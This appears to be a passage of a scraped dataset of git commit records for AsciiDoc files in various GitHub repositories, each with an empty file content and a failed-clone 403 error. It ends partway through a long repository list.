doc\/INTRODUCTION.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/INTRODUCTION.adoc","new_file":"doc\/INTRODUCTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07bdf2aa4794145216a0a49c3188ef24246705a0","subject":"docs: perf: add actual version and timing data","message":"docs: perf: add actual version and timing data\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/perf-others.adoc","new_file":"docs\/perf-others.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b7d1fee897568ca958f54805577b2d9c93bfa36","subject":"Stub for documentation","message":"Stub for documentation\n","repos":"tisnik\/fabric8-analytics-common,tisnik\/fabric8-analytics-common,tisnik\/fabric8-analytics-common","old_file":"baf\/baf.adoc","new_file":"baf\/baf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tisnik\/fabric8-analytics-common.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab913aba5fdc7d2207315818b3802ea7b6c3b04e","subject":"Update 2016-04-19-Converting-I-Pv6-to-Binary.adoc","message":"Update 2016-04-19-Converting-I-Pv6-to-Binary.adoc","repos":"julianrichen\/blog,julianrichen\/blog,julianrichen\/blog,julianrichen\/blog","old_file":"_posts\/2016-04-19-Converting-I-Pv6-to-Binary.adoc","new_file":"_posts\/2016-04-19-Converting-I-Pv6-to-Binary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/julianrichen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cb621ceb45919afcc76227b48d8a0d8b2d0f078","subject":"Add warning about how hstore extension should be installed.","message":"Add warning about how hstore extension should be installed.\n","repos":"djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf2ce14a3bbfbeeecb0b0316969565bf8e625dce","subject":"Update 2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","message":"Update 2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","new_file":"_posts\/2017-01-24-Pancake-C-M-S-Improvements-Week-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07559b12d789f410a50868eb830d3734f922c87e","subject":"y2b create post How to make S'mores in the microwave.","message":"y2b create post How to make S'mores in the microwave.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-07-How-to-make-Smores-in-the-microwave.adoc","new_file":"_posts\/2013-06-07-How-to-make-Smores-in-the-microwave.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6615f84d460aab3e87b9b15069ba8218c435e94","subject":"Update 2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","message":"Update 2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","repos":"jgornati\/jgornati.github.io,jgornati\/jgornati.github.io,jgornati\/jgornati.github.io","old_file":"_posts\/2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","new_file":"_posts\/2015-07-04-Utilizando-el-sensor-DHT11-y-nodejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jgornati\/jgornati.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48ddd7fb5273891812921c459a9f05bb7b6bde02","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39afadf7714d1651878d7d7d567b911151e174ce","subject":"Support the client side tests in the TCK. Record the request ID for when the queue use is improved.","message":"Support the client side tests in the TCK.\nRecord the request ID for when the queue use is improved.\n","repos":"microserviceux\/muon-java,volodymyrpavlenko\/muon-java,microserviceux\/muon-java","old_file":"muon-tck\/README.adoc","new_file":"muon-tck\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/volodymyrpavlenko\/muon-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9b1af76fa4a29fc4e303d2be28fd810145886510","subject":"Update 2016-07-22-terzo-post-aggiunto.adoc","message":"Update 2016-07-22-terzo-post-aggiunto.adoc","repos":"lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io,lerzegov\/lerzegov.github.io","old_file":"_posts\/2016-07-22-terzo-post-aggiunto.adoc","new_file":"_posts\/2016-07-22-terzo-post-aggiunto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lerzegov\/lerzegov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99e39066ceac2a642e0180e97f675bb232c26710","subject":"Update 2017-01-13-FUNDAMENTEL-RADIKAL.adoc","message":"Update 2017-01-13-FUNDAMENTEL-RADIKAL.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-01-13-FUNDAMENTEL-RADIKAL.adoc","new_file":"_posts\/2017-01-13-FUNDAMENTEL-RADIKAL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29c0bb02d267ba1a9e9fd80edd6c67e24d2da817","subject":"Create memory.asciidoc","message":"Create memory.asciidoc","repos":"aparnachaudhary\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7,apaolini\/nagios-plugin-jbossas7","old_file":"memory.asciidoc","new_file":"memory.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/nagios-plugin-jbossas7.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c5af947348c30a70c8257043f43f81c5d0e8a43","subject":"OS install graphics troubleshooting","message":"OS install graphics troubleshooting\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c77d22f9483618bd4dd51f8d071fe5b54b2482b","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94fe2c5c101d88a2b2b236c1172f1a029e8a66c0","subject":"Missing ;","message":"Missing ;\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Resources.adoc","new_file":"Best practices\/Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2c67d4f81d5d201234c2ae462ca4bcd9e29913f","subject":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","message":"Update 2016-12-09-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4725a12b3f65e2de18478b305a0fcc2a0baf3a9","subject":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","message":"Update 2017-05-29-Fortigate-Policy-Routing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_file":"_posts\/2017-05-29-Fortigate-Policy-Routing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a187794ef83d30f26a66ad9749f6f0c307ba108","subject":"Added news folder","message":"Added news folder\n","repos":"agoncal\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,addonis1990\/docs,forge\/docs,luiz158\/docs","old_file":"news\/2014-06-13-website.asciidoc","new_file":"news\/2014-06-13-website.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3e9e3fed0268b71468a79cf4943f566895a47825","subject":"Docs: Installation: clarify location of demo setup","message":"Docs: Installation: clarify location of demo setup\n\n\r\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49368c66c9ec90311d884ab5058011700ce0391b","subject":"Update 2013-07-07-Emberjs-query-parameters.adoc","message":"Update 2013-07-07-Emberjs-query-parameters.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-07-07-Emberjs-query-parameters.adoc","new_file":"_posts\/2013-07-07-Emberjs-query-parameters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f9679dcda4588047c5fa2255e177d9493d324d0","subject":"Update 2019-02-22-docker-selenium-with-php.adoc","message":"Update 2019-02-22-docker-selenium-with-php.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_file":"_posts\/2019-02-22-docker-selenium-with-php.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b9d8e88cbe040204fa61888e787f532513e041f","subject":"Update 2015-11-06-Yeah-About-that.adoc","message":"Update 2015-11-06-Yeah-About-that.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-06-Yeah-About-that.adoc","new_file":"_posts\/2015-11-06-Yeah-About-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13c156b42459b01a7293dcb18719001bdbb80b02","subject":"Update 2018-05-09-Test-blog-entry.adoc","message":"Update 2018-05-09-Test-blog-entry.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9863c6ea4500c24165eae408a395379594eebc7d","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a708b479c6b455f0daadb02af01d19fcc3aa7ec2","subject":"Update 2017-09-06-Mini.adoc","message":"Update 2017-09-06-Mini.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-09-06-Mini.adoc","new_file":"_posts\/2017-09-06-Mini.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef6ac76971c69f68a620a5c9b66579b947084d59","subject":"Blog post: How lucky are your random seeds? (correction 2)","message":"Blog post: How lucky are your random seeds? (correction 2)\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website","old_file":"blog\/2015-09-30-HowLuckyAreYourRandomSeeds.adoc","new_file":"blog\/2015-09-30-HowLuckyAreYourRandomSeeds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5afd39e36c8c12655b373fc88818902b0145e60e","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b70881b09bada1301e75ca635bb1852af3f6af69","subject":"y2b create post The Golden Headphones","message":"y2b create post The Golden Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-20-The-Golden-Headphones.adoc","new_file":"_posts\/2016-05-20-The-Golden-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9861e38d31bcfed5ccd21750294ed7147e513fcf","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccb15b6563c82fd75eac60748195cc113f52e9d6","subject":"OGM-683 Improve MongoDB documentation (beginning of storage principles)","message":"OGM-683 Improve MongoDB documentation (beginning of storage principles)\n","repos":"ZJaffee\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,hibernate\/hibernate-ogm,ZJaffee\/hibernate-ogm,uugaa\/hibernate-ogm,jhalliday\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,hibernate\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,Sanne\/hibernate-ogm,ZJaffee\/hibernate-ogm,gunnarmorling\/hibernate-ogm,gunnarmorling\/hibernate-ogm,jhalliday\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm-cassandra,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,jhalliday\/hibernate-ogm,mp911de\/hibernate-ogm,Sanne\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm,tempbottle\/hibernate-ogm,Sanne\/hibernate-ogm,tempbottle\/hibernate-ogm,uugaa\/hibernate-ogm,schernolyas\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,DavideD\/hibernate-ogm,uugaa\/hibernate-ogm,tempbottle\/hibernate-ogm,hferentschik\/hibernate-ogm,hibernate\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/mongodb.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"d5bf00e8059c6980be31714df36affae4c9d1117","subject":"y2b create post Canon S100 Unboxing \\u0026 Overview","message":"y2b create post Canon S100 Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Canon-S100-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-01-06-Canon-S100-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f714c5739010108735e51a5e8321699077d9aaf","subject":"Update 2016-03-15-Hello-World.adoc","message":"Update 2016-03-15-Hello-World.adoc","repos":"nickwanhere\/nickwanhere.github.io,nickwanhere\/nickwanhere.github.io,nickwanhere\/nickwanhere.github.io,nickwanhere\/nickwanhere.github.io","old_file":"_posts\/2016-03-15-Hello-World.adoc","new_file":"_posts\/2016-03-15-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nickwanhere\/nickwanhere.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915f126d1ec0043a43d9954421c866fdecd578d4","subject":"HLS-LFCD LDS Sensor","message":"HLS-LFCD LDS Sensor\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"Ros Gazebo\/README.adoc","new_file":"Ros Gazebo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"713f0b1f6c6e79cc36073f6a9ffb4d1df79f05d9","subject":"Update 2017-08-26-Kotlin.adoc","message":"Update 2017-08-26-Kotlin.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-26-Kotlin.adoc","new_file":"_posts\/2017-08-26-Kotlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc8dca32eee5f860515637143cba0232ad2a67c3","subject":"Update 2019-11-29-to-you.adoc","message":"Update 2019-11-29-to-you.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-29-to-you.adoc","new_file":"_posts\/2019-11-29-to-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f1390930b073f99d6aa79fbf9feef92035611e05","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0acaf15af151b3256edf5f675999a50a3dbdc615","subject":"Update 2018-03-25-Whats-up-Flutter-March-2018.adoc","message":"Update 2018-03-25-Whats-up-Flutter-March-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc","new_file":"_posts\/2018-03-25-Whats-up-Flutter-March-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3eb36388221649935a1f3e722103013f111c309","subject":"Link directly to the attachments in arrays section","message":"Link directly to the attachments in arrays section\n\nThe link should be made to the relevant section of the ingest attachments documentation, rather than the top of the page.","repos":"GlenRSmith\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,StefanGor\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,glefloch\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elasticassandra,scottsom\/elasticsearch,lks21c\/elasticsearch,wuranbo\/elasticsearch,JackyMai\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,C-Bish\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,wangtuo\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,Helen-Zhao\/elasticsearch,mohit\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,JackyMai\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,alexshadow007\/elasticsearch,henakamaMSFT\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,nezirus\/elasticsearch,masaruh\/elasticsearch,sneivandt\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,mikemccand\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,Shepard1212\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,a2lin\/elasticsearch,StefanGor\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,IanvsPoplicola\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,Shepard1212\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,jimczi\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,artnowo\/elasticsearch,i-am-Nathan\/elasticsearch,scorpionvicky\/elasticsearch,rlugojr\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,rlugojr\/elasticsearch,Stacey-Gammon\/elasticsearch,bawse\/elasticsearch,jprante\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,nilabhsagar\/elasticsearch,nknize\/elasticsearch,nilabhsagar\/elasticsearch,geidies\/elasticsearch,MisterAndersen\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,pozhidaevak\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elassandra,elasticdog\/elasticsearch,elasticdog\/elasticsearch,scottsom\/elasticsearch,b